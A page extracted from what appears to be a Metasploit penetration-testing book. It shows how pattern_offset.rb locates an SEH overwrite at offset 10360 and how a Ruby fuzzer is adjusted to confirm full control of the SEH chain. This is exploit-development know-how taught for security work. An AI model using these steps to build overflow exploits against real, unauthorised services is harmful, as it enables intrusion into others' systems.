background image

Creating Your Own Exploits

203

With the SEH overwritten with our random set of characters, we can use 

pattern_offset.rb 

in

 /opt/metasploit3/msf3/tools/ 

to determine exactly where the 

overwrite occurs by passing the characters of interest (

684E3368

) followed by 

the length of the string that was sent to the target (

11000

), as shown here:

root@bt:~/.msf3/modules/auxiliary/fuzzers# 

/opt/metasploit3/msf3/tools/pattern_offset.rb 

684E3368 11000

10360

The value 

10360

 means that the four bytes that overwrite SEH are 10361, 

10362, 10363, and 10364. We can now change the fuzzer code one last time 
to verify our findings:

print_status("Generating fuzzed data...")
 fuzzed = "\x41" * 

10360

 fuzzed << "\x42" * 

4

 fuzzed << "\x43" * 

636

print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)

As shown, the fuzzer will build the malicious request beginning with 

10,360 

A

s (hexadecimal 

41

), followed by four 

B

s (hexadecimal 

42

) to over-

write the SEH, and then 636 

C

s (hexadecimal 

43

) as filler to keep the string 

length constant at 11,000 bytes.

Running the fuzzer against the target again shows that the entire SEH 

chain is under your complete control, as shown in Figure 14-4.

Figure 14-4: SEH fully controlled